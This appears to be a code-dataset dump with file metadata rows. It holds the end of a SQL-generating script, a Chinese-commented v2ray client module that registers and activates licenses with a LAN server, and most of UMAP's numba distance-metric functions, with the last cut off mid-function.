sql = sql[:index] + ' (Make_ID , Model_ID , Make_Name, Model_Name , Type_1, Type_2 , Loft , Length , Shaft , Flex , icon_index ) '+sql[index:]
fout.write(sql + ';\n')
fout.close()
if __name__ == '__main__':
path = ''
if len(sys.argv) > 1:
path = sys.argv[1] + r'\baseball\trunk\model\db_p\tablemodel\\'
else:
raise Exception('Please input ios svn root path')
# path = r'd:\workspace\golfsense\svn_gs2\ios\golfsense\trunk\model\db_p\tablemodel\\'
main(path)
originSqlRefine.main()
| 29.224719 | 218 | 0.417147 |
f6de5403105a546d91ec40dc31a9d174266315a6 | 1,790 | py | Python | src/test/lcv2-2ray-5.0.1-/v2ray_old_3_2019-1-4/client/windows/mods/s_server.py | lucycore/lcv2 | cfda722b430036e2a2de946b71d81d265e2165dc | [
"MIT"
] | null | null | null | src/test/lcv2-2ray-5.0.1-/v2ray_old_3_2019-1-4/client/windows/mods/s_server.py | lucycore/lcv2 | cfda722b430036e2a2de946b71d81d265e2165dc | [
"MIT"
] | null | null | null | src/test/lcv2-2ray-5.0.1-/v2ray_old_3_2019-1-4/client/windows/mods/s_server.py | lucycore/lcv2 | cfda722b430036e2a2de946b71d81d265e2165dc | [
"MIT"
] | null | null | null | import socket
from urllib import request
def mod_1(user_id):
'''
普通连接模式
需要的数据:
uuid
服务器命令分割:
re -> 是否允许连接
time -> 时间 到期时间
json -> v2服务器配置文件
gg -> 服务器公告
'''
#开始创建socks
sock = socket.socket()
HOST = "192.168.1.104"
PORT = 2233
sock.connect((HOST, PORT))
#发送模式
sock.sendall("mod_1".encode())
server_myd = sock.recv(1024).decode()
#发送id
sock.sendall(user_id.encode())
#接受服务器的状态码
server_s = sock.recv(1024).decode()
sock.close()
#服务器命令分割
sr_lb = server_s.split('.')
sr_re = sr_lb[0]
sr_time = sr_lb[1]
sr_json = sr_lb[2]
sr_gg = sr_lb[3]
sr_x = sr_lb[4]
return sr_re,sr_time,sr_json,sr_gg,sr_x
def mod_2(user_id):
'''
密钥添加模式
需要的数据:
uuid, key
服务器命令分割:
re -> 是否激活成功
'''
print("您还没有激活 或 已到期!")
print("请重新输入密钥激活程序!")
key = input("请输入密钥:")
while key == "":
print("不可以输入空白内容!")
key = input("请输入密钥:")
#开始创建socks
sock = socket.socket()
HOST = "192.168.1.104"
PORT = 2233
sock.connect((HOST, PORT))
#发送模式
sock.sendall("mod_2".encode())
server_myd = sock.recv(1024).decode()
#发送id
sock.sendall(user_id.encode())
server_myd = sock.recv(1024).decode()
#发送key
sock.sendall(user_id.encode())
#接受服务器的状态码
server_s = sock.recv(1024).decode()
sock.close()
#服务器命令分割
if server_s == "True":
print("激活成功!")
print("正在重启程序!")
else:
print("激活失败!")
print("请重新输入密钥!")
mod_2(user_id)
def mod_3(user_id):
'''
注册模式
需要的数据:
uuid
服务器命令分割:
re -> 是否注册成功
'''
#开始创建socks
sock = socket.socket()
HOST = "192.168.1.104"
PORT = 2233
sock.connect((HOST, PORT))
#发送模式
sock.sendall("mod_3".encode())
server_myd = sock.recv(1024).decode()
#发送id
sock.sendall(user_id.encode())
#接受服务器的状态码
server_s = sock.recv(1024).decode()
sock.close()
#服务器命令分割
sr_re = server_s
if sr_re == "True":
print("注册成功!")
else:
mod_3(user_id) | 16.574074 | 40 | 0.650279 |
1ac68b2fa32f8bcbc9a2e791ab41b1ffaf62d9af | 34,724 | py | Python | umap/distances.py | worldbeater/umap | eb8c4b2bbb08c1fc9b6a983af8d50a8d03468735 | [
"BSD-3-Clause"
] | 5,537 | 2017-07-09T20:26:23.000Z | 2022-03-29T17:11:16.000Z | umap/distances.py | worldbeater/umap | eb8c4b2bbb08c1fc9b6a983af8d50a8d03468735 | [
"BSD-3-Clause"
] | 776 | 2017-07-09T17:20:20.000Z | 2022-03-31T13:37:40.000Z | umap/distances.py | worldbeater/umap | eb8c4b2bbb08c1fc9b6a983af8d50a8d03468735 | [
"BSD-3-Clause"
] | 712 | 2017-07-09T17:03:39.000Z | 2022-03-30T16:54:09.000Z | # Author: Leland McInnes <leland.mcinnes@gmail.com>
#
# License: BSD 3 clause
import numba
import numpy as np
import scipy.stats
from sklearn.metrics import pairwise_distances
_mock_identity = np.eye(2, dtype=np.float64)
_mock_cost = 1.0 - _mock_identity
_mock_ones = np.ones(2, dtype=np.float64)
@numba.njit()
def sign(a):
if a < 0:
return -1
else:
return 1
@numba.njit(fastmath=True)
def euclidean(x, y):
r"""Standard euclidean distance.
..math::
D(x, y) = \sqrt{\sum_i (x_i - y_i)^2}
"""
result = 0.0
for i in range(x.shape[0]):
result += (x[i] - y[i]) ** 2
return np.sqrt(result)
@numba.njit(fastmath=True)
def euclidean_grad(x, y):
r"""Standard euclidean distance and its gradient.
..math::
D(x, y) = \sqrt{\sum_i (x_i - y_i)^2}
\frac{dD(x, y)}{dx} = (x_i - y_i)/D(x,y)
"""
result = 0.0
for i in range(x.shape[0]):
result += (x[i] - y[i]) ** 2
d = np.sqrt(result)
grad = (x - y) / (1e-6 + d)
return d, grad
@numba.njit()
def standardised_euclidean(x, y, sigma=_mock_ones):
r"""Euclidean distance standardised against a vector of standard
deviations per coordinate.
..math::
D(x, y) = \sqrt{\sum_i \frac{(x_i - y_i)**2}{v_i}}
"""
result = 0.0
for i in range(x.shape[0]):
result += ((x[i] - y[i]) ** 2) / sigma[i]
return np.sqrt(result)
@numba.njit(fastmath=True)
def standardised_euclidean_grad(x, y, sigma=_mock_ones):
r"""Euclidean distance standardised against a vector of standard
deviations per coordinate with gradient.
..math::
D(x, y) = \sqrt{\sum_i \frac{(x_i - y_i)**2}{v_i}}
"""
result = 0.0
for i in range(x.shape[0]):
result += (x[i] - y[i]) ** 2 / sigma[i]
d = np.sqrt(result)
grad = (x - y) / (1e-6 + d * sigma)
return d, grad
@numba.njit()
def manhattan(x, y):
r"""Manhattan, taxicab, or l1 distance.
..math::
D(x, y) = \sum_i |x_i - y_i|
"""
result = 0.0
for i in range(x.shape[0]):
result += np.abs(x[i] - y[i])
return result
@numba.njit()
def manhattan_grad(x, y):
r"""Manhattan, taxicab, or l1 distance with gradient.
..math::
D(x, y) = \sum_i |x_i - y_i|
"""
result = 0.0
grad = np.zeros(x.shape)
for i in range(x.shape[0]):
result += np.abs(x[i] - y[i])
grad[i] = np.sign(x[i] - y[i])
return result, grad
@numba.njit()
def chebyshev(x, y):
r"""Chebyshev or l-infinity distance.
..math::
D(x, y) = \max_i |x_i - y_i|
"""
result = 0.0
for i in range(x.shape[0]):
result = max(result, np.abs(x[i] - y[i]))
return result
@numba.njit()
def chebyshev_grad(x, y):
r"""Chebyshev or l-infinity distance with gradient.
..math::
D(x, y) = \max_i |x_i - y_i|
"""
result = 0.0
max_i = 0
for i in range(x.shape[0]):
v = np.abs(x[i] - y[i])
if v > result:
result = v
max_i = i
grad = np.zeros(x.shape)
grad[max_i] = np.sign(x[max_i] - y[max_i])
return result, grad
@numba.njit()
def minkowski(x, y, p=2):
r"""Minkowski distance.
..math::
D(x, y) = \left(\sum_i |x_i - y_i|^p\right)^{\frac{1}{p}}
This is a general distance. For p=1 it is equivalent to
manhattan distance, for p=2 it is Euclidean distance, and
for p=infinity it is Chebyshev distance. In general it is better
to use the more specialised functions for those distances.
"""
result = 0.0
for i in range(x.shape[0]):
result += (np.abs(x[i] - y[i])) ** p
return result ** (1.0 / p)
@numba.njit()
def minkowski_grad(x, y, p=2):
r"""Minkowski distance with gradient.
..math::
D(x, y) = \left(\sum_i |x_i - y_i|^p\right)^{\frac{1}{p}}
This is a general distance. For p=1 it is equivalent to
manhattan distance, for p=2 it is Euclidean distance, and
for p=infinity it is Chebyshev distance. In general it is better
to use the more specialised functions for those distances.
"""
result = 0.0
for i in range(x.shape[0]):
result += (np.abs(x[i] - y[i])) ** p
grad = np.empty(x.shape[0], dtype=np.float32)
for i in range(x.shape[0]):
grad[i] = (
pow(np.abs(x[i] - y[i]), (p - 1.0))
* sign(x[i] - y[i])
* pow(result, (1.0 / (p - 1)))
)
return result ** (1.0 / p), grad
@numba.njit()
def poincare(u, v):
r"""Poincare distance.
..math::
\delta (u, v) = 2 \frac{ \lVert u - v \rVert ^2 }{ ( 1 - \lVert u \rVert ^2 ) ( 1 - \lVert v \rVert ^2 ) }
D(x, y) = \operatorname{arcosh} (1+\delta (u,v))
"""
sq_u_norm = np.sum(u * u)
sq_v_norm = np.sum(v * v)
sq_dist = np.sum(np.power(u - v, 2))
return np.arccosh(1 + 2 * (sq_dist / ((1 - sq_u_norm) * (1 - sq_v_norm))))
@numba.njit()
def hyperboloid_grad(x, y):
s = np.sqrt(1 + np.sum(x ** 2))
t = np.sqrt(1 + np.sum(y ** 2))
B = s * t
for i in range(x.shape[0]):
B -= x[i] * y[i]
if B <= 1:
B = 1.0 + 1e-8
grad_coeff = 1.0 / (np.sqrt(B - 1) * np.sqrt(B + 1))
# return np.arccosh(B), np.zeros(x.shape[0])
grad = np.zeros(x.shape[0])
for i in range(x.shape[0]):
grad[i] = grad_coeff * (((x[i] * t) / s) - y[i])
return np.arccosh(B), grad
@numba.njit()
def weighted_minkowski(x, y, w=_mock_ones, p=2):
r"""A weighted version of Minkowski distance.
..math::
D(x, y) = \left(\sum_i w_i |x_i - y_i|^p\right)^{\frac{1}{p}}
If weights w_i are inverse standard deviations of data in each dimension
then this represented a standardised Minkowski distance (and is
equivalent to standardised Euclidean distance for p=1).
"""
result = 0.0
for i in range(x.shape[0]):
result += (w[i] * np.abs(x[i] - y[i])) ** p
return result ** (1.0 / p)
@numba.njit()
def weighted_minkowski_grad(x, y, w=_mock_ones, p=2):
r"""A weighted version of Minkowski distance with gradient.
..math::
D(x, y) = \left(\sum_i w_i |x_i - y_i|^p\right)^{\frac{1}{p}}
If weights w_i are inverse standard deviations of data in each dimension
then this represented a standardised Minkowski distance (and is
equivalent to standardised Euclidean distance for p=1).
"""
result = 0.0
for i in range(x.shape[0]):
result += (w[i] * np.abs(x[i] - y[i])) ** p
grad = np.empty(x.shape[0], dtype=np.float32)
for i in range(x.shape[0]):
grad[i] = (
w[i] ** p
* pow(np.abs(x[i] - y[i]), (p - 1.0))
* sign(x[i] - y[i])
* pow(result, (1.0 / (p - 1)))
)
return result ** (1.0 / p), grad
@numba.njit()
def mahalanobis(x, y, vinv=_mock_identity):
result = 0.0
diff = np.empty(x.shape[0], dtype=np.float32)
for i in range(x.shape[0]):
diff[i] = x[i] - y[i]
for i in range(x.shape[0]):
tmp = 0.0
for j in range(x.shape[0]):
tmp += vinv[i, j] * diff[j]
result += tmp * diff[i]
return np.sqrt(result)
@numba.njit()
def mahalanobis_grad(x, y, vinv=_mock_identity):
result = 0.0
diff = np.empty(x.shape[0], dtype=np.float32)
for i in range(x.shape[0]):
diff[i] = x[i] - y[i]
grad_tmp = np.zeros(x.shape)
for i in range(x.shape[0]):
tmp = 0.0
for j in range(x.shape[0]):
tmp += vinv[i, j] * diff[j]
grad_tmp[i] += vinv[i, j] * diff[j]
result += tmp * diff[i]
dist = np.sqrt(result)
grad = grad_tmp / (1e-6 + dist)
return dist, grad
@numba.njit()
def hamming(x, y):
result = 0.0
for i in range(x.shape[0]):
if x[i] != y[i]:
result += 1.0
return float(result) / x.shape[0]
@numba.njit()
def canberra(x, y):
result = 0.0
for i in range(x.shape[0]):
denominator = np.abs(x[i]) + np.abs(y[i])
if denominator > 0:
result += np.abs(x[i] - y[i]) / denominator
return result
@numba.njit()
def canberra_grad(x, y):
result = 0.0
grad = np.zeros(x.shape)
for i in range(x.shape[0]):
denominator = np.abs(x[i]) + np.abs(y[i])
if denominator > 0:
result += np.abs(x[i] - y[i]) / denominator
grad[i] = (
np.sign(x[i] - y[i]) / denominator
- np.abs(x[i] - y[i]) * np.sign(x[i]) / denominator ** 2
)
return result, grad
@numba.njit()
def bray_curtis(x, y):
numerator = 0.0
denominator = 0.0
for i in range(x.shape[0]):
numerator += np.abs(x[i] - y[i])
denominator += np.abs(x[i] + y[i])
if denominator > 0.0:
return float(numerator) / denominator
else:
return 0.0
@numba.njit()
def bray_curtis_grad(x, y):
numerator = 0.0
denominator = 0.0
for i in range(x.shape[0]):
numerator += np.abs(x[i] - y[i])
denominator += np.abs(x[i] + y[i])
if denominator > 0.0:
dist = float(numerator) / denominator
grad = (np.sign(x - y) - dist) / denominator
else:
dist = 0.0
grad = np.zeros(x.shape)
return dist, grad
@numba.njit()
def jaccard(x, y):
num_non_zero = 0.0
num_equal = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_non_zero += x_true or y_true
num_equal += x_true and y_true
if num_non_zero == 0.0:
return 0.0
else:
return float(num_non_zero - num_equal) / num_non_zero
@numba.njit()
def matching(x, y):
num_not_equal = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_not_equal += x_true != y_true
return float(num_not_equal) / x.shape[0]
@numba.njit()
def dice(x, y):
num_true_true = 0.0
num_not_equal = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_true_true += x_true and y_true
num_not_equal += x_true != y_true
if num_not_equal == 0.0:
return 0.0
else:
return num_not_equal / (2.0 * num_true_true + num_not_equal)
@numba.njit()
def kulsinski(x, y):
num_true_true = 0.0
num_not_equal = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_true_true += x_true and y_true
num_not_equal += x_true != y_true
if num_not_equal == 0:
return 0.0
else:
return float(num_not_equal - num_true_true + x.shape[0]) / (
num_not_equal + x.shape[0]
)
@numba.njit()
def rogers_tanimoto(x, y):
num_not_equal = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_not_equal += x_true != y_true
return (2.0 * num_not_equal) / (x.shape[0] + num_not_equal)
@numba.njit()
def russellrao(x, y):
num_true_true = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_true_true += x_true and y_true
if num_true_true == np.sum(x != 0) and num_true_true == np.sum(y != 0):
return 0.0
else:
return float(x.shape[0] - num_true_true) / (x.shape[0])
@numba.njit()
def sokal_michener(x, y):
num_not_equal = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_not_equal += x_true != y_true
return (2.0 * num_not_equal) / (x.shape[0] + num_not_equal)
@numba.njit()
def sokal_sneath(x, y):
num_true_true = 0.0
num_not_equal = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_true_true += x_true and y_true
num_not_equal += x_true != y_true
if num_not_equal == 0.0:
return 0.0
else:
return num_not_equal / (0.5 * num_true_true + num_not_equal)
@numba.njit()
def haversine(x, y):
if x.shape[0] != 2:
raise ValueError("haversine is only defined for 2 dimensional data")
sin_lat = np.sin(0.5 * (x[0] - y[0]))
sin_long = np.sin(0.5 * (x[1] - y[1]))
result = np.sqrt(sin_lat ** 2 + np.cos(x[0]) * np.cos(y[0]) * sin_long ** 2)
return 2.0 * np.arcsin(result)
@numba.njit()
def haversine_grad(x, y):
# spectral initialization puts many points near the poles
# currently, adding pi/2 to the latitude avoids problems
# TODO: reimplement with quaternions to avoid singularity
if x.shape[0] != 2:
raise ValueError("haversine is only defined for 2 dimensional data")
sin_lat = np.sin(0.5 * (x[0] - y[0]))
cos_lat = np.cos(0.5 * (x[0] - y[0]))
sin_long = np.sin(0.5 * (x[1] - y[1]))
cos_long = np.cos(0.5 * (x[1] - y[1]))
a_0 = np.cos(x[0] + np.pi / 2) * np.cos(y[0] + np.pi / 2) * sin_long ** 2
a_1 = a_0 + sin_lat ** 2
d = 2.0 * np.arcsin(np.sqrt(min(max(abs(a_1), 0), 1)))
denom = np.sqrt(abs(a_1 - 1)) * np.sqrt(abs(a_1))
grad = (
np.array(
[
(
sin_lat * cos_lat
- np.sin(x[0] + np.pi / 2)
* np.cos(y[0] + np.pi / 2)
* sin_long ** 2
),
(
np.cos(x[0] + np.pi / 2)
* np.cos(y[0] + np.pi / 2)
* sin_long
* cos_long
),
]
)
/ (denom + 1e-6)
)
return d, grad
@numba.njit()
def yule(x, y):
num_true_true = 0.0
num_true_false = 0.0
num_false_true = 0.0
for i in range(x.shape[0]):
x_true = x[i] != 0
y_true = y[i] != 0
num_true_true += x_true and y_true
num_true_false += x_true and (not y_true)
num_false_true += (not x_true) and y_true
num_false_false = x.shape[0] - num_true_true - num_true_false - num_false_true
if num_true_false == 0.0 or num_false_true == 0.0:
return 0.0
else:
return (2.0 * num_true_false * num_false_true) / (
num_true_true * num_false_false + num_true_false * num_false_true
)
@numba.njit()
def cosine(x, y):
result = 0.0
norm_x = 0.0
norm_y = 0.0
for i in range(x.shape[0]):
result += x[i] * y[i]
norm_x += x[i] ** 2
norm_y += y[i] ** 2
if norm_x == 0.0 and norm_y == 0.0:
return 0.0
elif norm_x == 0.0 or norm_y == 0.0:
return 1.0
else:
return 1.0 - (result / np.sqrt(norm_x * norm_y))
@numba.njit(fastmath=True)
def cosine_grad(x, y):
result = 0.0
norm_x = 0.0
norm_y = 0.0
for i in range(x.shape[0]):
result += x[i] * y[i]
norm_x += x[i] ** 2
norm_y += y[i] ** 2
if norm_x == 0.0 and norm_y == 0.0:
dist = 0.0
grad = np.zeros(x.shape)
elif norm_x == 0.0 or norm_y == 0.0:
dist = 1.0
grad = np.zeros(x.shape)
else:
grad = -(x * result - y * norm_x) / np.sqrt(norm_x ** 3 * norm_y)
dist = 1.0 - (result / np.sqrt(norm_x * norm_y))
return dist, grad
@numba.njit()
def correlation(x, y):
mu_x = 0.0
mu_y = 0.0
norm_x = 0.0
norm_y = 0.0
dot_product = 0.0
for i in range(x.shape[0]):
mu_x += x[i]
mu_y += y[i]
mu_x /= x.shape[0]
mu_y /= x.shape[0]
for i in range(x.shape[0]):
shifted_x = x[i] - mu_x
shifted_y = y[i] - mu_y
norm_x += shifted_x ** 2
norm_y += shifted_y ** 2
dot_product += shifted_x * shifted_y
if norm_x == 0.0 and norm_y == 0.0:
return 0.0
elif dot_product == 0.0:
return 1.0
else:
return 1.0 - (dot_product / np.sqrt(norm_x * norm_y))
@numba.njit()
def hellinger(x, y):
result = 0.0
l1_norm_x = 0.0
l1_norm_y = 0.0
for i in range(x.shape[0]):
result += np.sqrt(x[i] * y[i])
l1_norm_x += x[i]
l1_norm_y += y[i]
if l1_norm_x == 0 and l1_norm_y == 0:
return 0.0
elif l1_norm_x == 0 or l1_norm_y == 0:
return 1.0
else:
return np.sqrt(1 - result / np.sqrt(l1_norm_x * l1_norm_y))
@numba.njit()
def hellinger_grad(x, y):
result = 0.0
l1_norm_x = 0.0
l1_norm_y = 0.0
grad_term = np.empty(x.shape[0])
for i in range(x.shape[0]):
grad_term[i] = np.sqrt(x[i] * y[i])
result += grad_term[i]
l1_norm_x += x[i]
l1_norm_y += y[i]
if l1_norm_x == 0 and l1_norm_y == 0:
dist = 0.0
grad = np.zeros(x.shape)
elif l1_norm_x == 0 or l1_norm_y == 0:
dist = 1.0
grad = np.zeros(x.shape)
else:
dist_denom = np.sqrt(l1_norm_x * l1_norm_y)
dist = np.sqrt(1 - result / dist_denom)
grad_denom = 2 * dist
grad_numer_const = (l1_norm_y * result) / (2 * dist_denom ** 3)
grad = (grad_numer_const - (y / grad_term * dist_denom)) / grad_denom
return dist, grad
@numba.njit()
def approx_log_Gamma(x):
if x == 1:
return 0
# x2= 1/(x*x);
return x * np.log(x) - x + 0.5 * np.log(2.0 * np.pi / x) + 1.0 / (x * 12.0)
# + x2*(-1.0/360.0) + x2* (1.0/1260.0 + x2*(-1.0/(1680.0) +\
# x2*(1.0/1188.0 + x2*(-691.0/360360.0 + x2*(1.0/156.0 +\
# x2*(-3617.0/122400.0 + x2*(43687.0/244188.0 + x2*(-174611.0/125400.0) +\
# x2*(77683.0/5796.0 + x2*(-236364091.0/1506960.0 + x2*(657931.0/300.0))))))))))))
@numba.njit()
def log_beta(x, y):
a = min(x, y)
b = max(x, y)
if b < 5:
value = -np.log(b)
for i in range(1, int(a)):
value += np.log(i) - np.log(b + i)
return value
else:
return approx_log_Gamma(x) + approx_log_Gamma(y) - approx_log_Gamma(x + y)
@numba.njit()
def log_single_beta(x):
return np.log(2.0) * (-2.0 * x + 0.5) + 0.5 * np.log(2.0 * np.pi / x) + 0.125 / x
# + x2*(-1.0/192.0 + x2* (1.0/640.0 + x2*(-17.0/(14336.0) +\
# x2*(31.0/18432.0 + x2*(-691.0/180224.0 +\
# x2*(5461.0/425984.0 + x2*(-929569.0/15728640.0 +\
# x2*(3189151.0/8912896.0 + x2*(-221930581.0/79691776.0) +\
# x2*(4722116521.0/176160768.0 + x2*(-968383680827.0/3087007744.0 +\
# x2*(14717667114151.0/3355443200.0 ))))))))))))
@numba.njit()
def ll_dirichlet(data1, data2):
"""The symmetric relative log likelihood of rolling data2 vs data1
in n trials on a die that rolled data1 in sum(data1) trials.
..math::
D(data1, data2) = DirichletMultinomail(data2 | data1)
"""
n1 = np.sum(data1)
n2 = np.sum(data2)
log_b = 0.0
self_denom1 = 0.0
self_denom2 = 0.0
for i in range(data1.shape[0]):
if data1[i] * data2[i] > 0.9:
log_b += log_beta(data1[i], data2[i])
self_denom1 += log_single_beta(data1[i])
self_denom2 += log_single_beta(data2[i])
else:
if data1[i] > 0.9:
self_denom1 += log_single_beta(data1[i])
if data2[i] > 0.9:
self_denom2 += log_single_beta(data2[i])
return np.sqrt(
1.0 / n2 * (log_b - log_beta(n1, n2) - (self_denom2 - log_single_beta(n2)))
+ 1.0 / n1 * (log_b - log_beta(n2, n1) - (self_denom1 - log_single_beta(n1)))
)
@numba.njit(fastmath=True)
def symmetric_kl(x, y, z=1e-11): # pragma: no cover
r"""
symmetrized KL divergence between two probability distributions
..math::
D(x, y) = \frac{D_{KL}\left(x \Vert y\right) + D_{KL}\left(y \Vert x\right)}{2}
"""
n = x.shape[0]
x_sum = 0.0
y_sum = 0.0
kl1 = 0.0
kl2 = 0.0
for i in range(n):
x[i] += z
x_sum += x[i]
y[i] += z
y_sum += y[i]
for i in range(n):
x[i] /= x_sum
y[i] /= y_sum
for i in range(n):
kl1 += x[i] * np.log(x[i] / y[i])
kl2 += y[i] * np.log(y[i] / x[i])
return (kl1 + kl2) / 2
@numba.njit(fastmath=True)
def symmetric_kl_grad(x, y, z=1e-11): # pragma: no cover
"""
symmetrized KL divergence and its gradient
"""
n = x.shape[0]
x_sum = 0.0
y_sum = 0.0
kl1 = 0.0
kl2 = 0.0
for i in range(n):
x[i] += z
x_sum += x[i]
y[i] += z
y_sum += y[i]
for i in range(n):
x[i] /= x_sum
y[i] /= y_sum
for i in range(n):
kl1 += x[i] * np.log(x[i] / y[i])
kl2 += y[i] * np.log(y[i] / x[i])
dist = (kl1 + kl2) / 2
grad = (np.log(y / x) - (x / y) + 1) / 2
return dist, grad
@numba.njit()
def correlation_grad(x, y):
mu_x = 0.0
mu_y = 0.0
norm_x = 0.0
norm_y = 0.0
dot_product = 0.0
for i in range(x.shape[0]):
mu_x += x[i]
mu_y += y[i]
mu_x /= x.shape[0]
mu_y /= x.shape[0]
for i in range(x.shape[0]):
shifted_x = x[i] - mu_x
shifted_y = y[i] - mu_y
norm_x += shifted_x ** 2
norm_y += shifted_y ** 2
dot_product += shifted_x * shifted_y
if norm_x == 0.0 and norm_y == 0.0:
dist = 0.0
grad = np.zeros(x.shape)
elif dot_product == 0.0:
dist = 1.0
grad = np.zeros(x.shape)
else:
dist = 1.0 - (dot_product / np.sqrt(norm_x * norm_y))
grad = ((x - mu_x) / norm_x - (y - mu_y) / dot_product) * dist
return dist, grad
@numba.njit(fastmath=True)
def sinkhorn_distance(
x, y, M=_mock_identity, cost=_mock_cost, maxiter=64
): # pragma: no cover
p = (x / x.sum()).astype(np.float32)
q = (y / y.sum()).astype(np.float32)
u = np.ones(p.shape, dtype=np.float32)
v = np.ones(q.shape, dtype=np.float32)
for n in range(maxiter):
t = M @ v
u[t > 0] = p[t > 0] / t[t > 0]
t = M.T @ u
v[t > 0] = q[t > 0] / t[t > 0]
pi = np.diag(v) @ M @ np.diag(u)
result = 0.0
for i in range(pi.shape[0]):
for j in range(pi.shape[1]):
if pi[i, j] > 0:
result += pi[i, j] * cost[i, j]
return result
@numba.njit(fastmath=True)
def spherical_gaussian_energy_grad(x, y): # pragma: no cover
mu_1 = x[0] - y[0]
mu_2 = x[1] - y[1]
sigma = np.abs(x[2]) + np.abs(y[2])
sign_sigma = np.sign(x[2])
dist = (mu_1 ** 2 + mu_2 ** 2) / (2 * sigma) + np.log(sigma) + np.log(2 * np.pi)
grad = np.empty(3, np.float32)
grad[0] = mu_1 / sigma
grad[1] = mu_2 / sigma
grad[2] = sign_sigma * (1.0 / sigma - (mu_1 ** 2 + mu_2 ** 2) / (2 * sigma ** 2))
return dist, grad
@numba.njit(fastmath=True)
def diagonal_gaussian_energy_grad(x, y): # pragma: no cover
mu_1 = x[0] - y[0]
mu_2 = x[1] - y[1]
sigma_11 = np.abs(x[2]) + np.abs(y[2])
sigma_12 = 0.0
sigma_22 = np.abs(x[3]) + np.abs(y[3])
det = sigma_11 * sigma_22
sign_s1 = np.sign(x[2])
sign_s2 = np.sign(x[3])
if det == 0.0:
# TODO: figure out the right thing to do here
return mu_1 ** 2 + mu_2 ** 2, np.array([0.0, 0.0, 1.0, 1.0], dtype=np.float32)
cross_term = 2 * sigma_12
m_dist = (
np.abs(sigma_22) * (mu_1 ** 2)
- cross_term * mu_1 * mu_2
+ np.abs(sigma_11) * (mu_2 ** 2)
)
dist = (m_dist / det + np.log(np.abs(det))) / 2.0 + np.log(2 * np.pi)
grad = np.empty(6, dtype=np.float32)
grad[0] = (2 * sigma_22 * mu_1 - cross_term * mu_2) / (2 * det)
grad[1] = (2 * sigma_11 * mu_2 - cross_term * mu_1) / (2 * det)
grad[2] = sign_s1 * (sigma_22 * (det - m_dist) + det * mu_2 ** 2) / (2 * det ** 2)
grad[3] = sign_s2 * (sigma_11 * (det - m_dist) + det * mu_1 ** 2) / (2 * det ** 2)
return dist, grad
@numba.njit(fastmath=True)
def gaussian_energy_grad(x, y): # pragma: no cover
mu_1 = x[0] - y[0]
mu_2 = x[1] - y[1]
# Ensure width are positive
x[2] = np.abs(x[2])
y[2] = np.abs(y[2])
# Ensure heights are positive
x[3] = np.abs(x[3])
y[3] = np.abs(y[3])
# Ensure angle is in range -pi,pi
x[4] = np.arcsin(np.sin(x[4]))
y[4] = np.arcsin(np.sin(y[4]))
# Covariance entries for y
a = y[2] * np.cos(y[4]) ** 2 + y[3] * np.sin(y[4]) ** 2
b = (y[2] - y[3]) * np.sin(y[4]) * np.cos(y[4])
c = y[3] * np.cos(y[4]) ** 2 + y[2] * np.sin(y[4]) ** 2
# Sum of covariance matrices
sigma_11 = x[2] * np.cos(x[4]) ** 2 + x[3] * np.sin(x[4]) ** 2 + a
sigma_12 = (x[2] - x[3]) * np.sin(x[4]) * np.cos(x[4]) + b
sigma_22 = x[2] * np.sin(x[4]) ** 2 + x[3] * np.cos(x[4]) ** 2 + c
# Determinant of the sum of covariances
det_sigma = np.abs(sigma_11 * sigma_22 - sigma_12 ** 2)
x_inv_sigma_y_numerator = (
sigma_22 * mu_1 ** 2 - 2 * sigma_12 * mu_1 * mu_2 + sigma_11 * mu_2 ** 2
)
if det_sigma < 1e-32:
return (
mu_1 ** 2 + mu_2 ** 2,
np.array([0.0, 0.0, 1.0, 1.0, 0.0], dtype=np.float32),
)
dist = x_inv_sigma_y_numerator / det_sigma + np.log(det_sigma) + np.log(2 * np.pi)
grad = np.zeros(5, np.float32)
grad[0] = (2 * sigma_22 * mu_1 - 2 * sigma_12 * mu_2) / det_sigma
grad[1] = (2 * sigma_11 * mu_2 - 2 * sigma_12 * mu_1) / det_sigma
grad[2] = mu_2 * (mu_2 * np.cos(x[4]) ** 2 - mu_1 * np.cos(x[4]) * np.sin(x[4]))
grad[2] += mu_1 * (mu_1 * np.sin(x[4]) ** 2 - mu_2 * np.cos(x[4]) * np.sin(x[4]))
grad[2] *= det_sigma
grad[2] -= x_inv_sigma_y_numerator * np.cos(x[4]) ** 2 * sigma_22
grad[2] -= x_inv_sigma_y_numerator * np.sin(x[4]) ** 2 * sigma_11
grad[2] += x_inv_sigma_y_numerator * 2 * sigma_12 * np.sin(x[4]) * np.cos(x[4])
grad[2] /= det_sigma ** 2 + 1e-8
grad[3] = mu_1 * (mu_1 * np.cos(x[4]) ** 2 - mu_2 * np.cos(x[4]) * np.sin(x[4]))
grad[3] += mu_2 * (mu_2 * np.sin(x[4]) ** 2 - mu_1 * np.cos(x[4]) * np.sin(x[4]))
grad[3] *= det_sigma
grad[3] -= x_inv_sigma_y_numerator * np.sin(x[4]) ** 2 * sigma_22
grad[3] -= x_inv_sigma_y_numerator * np.cos(x[4]) ** 2 * sigma_11
grad[3] -= x_inv_sigma_y_numerator * 2 * sigma_12 * np.sin(x[4]) * np.cos(x[4])
grad[3] /= det_sigma ** 2 + 1e-8
grad[4] = (x[3] - x[2]) * (
2 * mu_1 * mu_2 * np.cos(2 * x[4]) - (mu_1 ** 2 - mu_2 ** 2) * np.sin(2 * x[4])
)
grad[4] *= det_sigma
grad[4] -= x_inv_sigma_y_numerator * (x[3] - x[2]) * np.sin(2 * x[4]) * sigma_22
grad[4] -= x_inv_sigma_y_numerator * (x[2] - x[3]) * np.sin(2 * x[4]) * sigma_11
grad[4] -= x_inv_sigma_y_numerator * 2 * sigma_12 * (x[2] - x[3]) * np.cos(2 * x[4])
grad[4] /= det_sigma ** 2 + 1e-8
return dist, grad
@numba.njit(fastmath=True)
def spherical_gaussian_grad(x, y): # pragma: no cover
mu_1 = x[0] - y[0]
mu_2 = x[1] - y[1]
sigma = x[2] + y[2]
sigma_sign = np.sign(sigma)
if sigma == 0:
